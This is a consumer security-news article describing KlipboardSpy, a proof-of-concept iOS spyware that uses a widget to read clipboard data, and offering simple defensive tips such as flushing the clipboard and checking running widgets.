Home Malware Programs Vulnerability KlipboardSpy


Posted: February 26, 2020

KlipboardSpy is proof-of-concept spyware that demonstrates a text-copying vulnerability in iOS devices, such as smartphones. Although its author hasn't designed it with wild distribution in mind, threat actors may hijack this program and deploy it to cause harm. Users can protect themselves with anti-malware software for removing KlipboardSpy from their devices and being cautious about their interactions with the copy-and-paste feature.

Showing Off OS Weaknesses with Public Spying

Although Apple has a reputation for its distinctive walled garden philosophy towards security, that strategy has drawbacks – such as limiting the threat mitigation options that are available to the company's customers. A recent demonstration of the company's implementation of the copy-and-paste feature in two mobile device OSes provides clear examples of how criminals can take advantage of such an environment, with little for victims to do about it. KlipboardSpy, while not meant for live attacks, is a high-visibility demonstration of collecting device data that's 'out in the open.'

KlipboardSpy is a PoC or proof-of-concept spyware program that demonstrates the vulnerabilities elaborated upon by security researchers. Apple's implementation of the text copy-and-paste feature for all builds of iOS and iPadOS 13.3 leaves any clipboard-stored data, such as a link or a password, unprotected from access from virtually any other application. Apple considers the vulnerability as a non-issue due to the requirement of the application being in the foreground, and, therefore, visible to users.

However, KlipboardSpy, which is specific to iOS, circumvents this issue by loading a widget, KlipSpyWidget. Through this simple method, the second component harvests clipboard information whenever the device is on the home screen, which KlipboardSpy receives whenever the main app opens. Although researchers suggest various means of blocking these attacks, such as developing clipboard-specific permissions prompts, Apple has yet to take any action.

Erring on the Side of Caution with Spyware, White Hat or Otherwise

KlipboardSpy is 'White Hat' spyware that's not part of an illicit industry for harvesting data or making money off of its attacks. However, the distinguishment between White and Black Hat software can become blurry, if threat actors gain access to the source code of a third-party program. Hidden Tear, the Turkish file-locking Trojan, remains one of the most long-abiding examples showing how pure and educational intentions can become twisted into an unsafe part of the threat landscape.

All iOS users should respond to the non-consensual presence of KlipboardSpy as if it were any similar spyware, such as the Exodus malware. Malware experts can recommend some simple defenses against it, for now:

  • Users can 'flush' their clipboards by copying unimportant text immediately after copying sensitive content like passwords.
  • Current builds of KlipboardSpy are dependant on their widgets for stealing data without the app's being open. Users can always check which widgets are running by swiping right on their home screen or viewing the Notification Center.
  • Mobile devices not running iOS or iPadOS 13.3 aren't at risk, and so users may switch to other OSes as preferable for their safety.

Since Apple is taking no current actions against the now publicly known vulnerabilities, users should keep any relevant anti-malware services up-to-date for the removal of KlipboardSpy if it ever gets out into the wild.

The idea of locking down an operating system totally is more of an ideal than a reality, even for Apple. KlipboardSpy shows that it doesn't take a lot of effort to scale those garden walls – and that there are lucrative fruits for collecting after the exertion.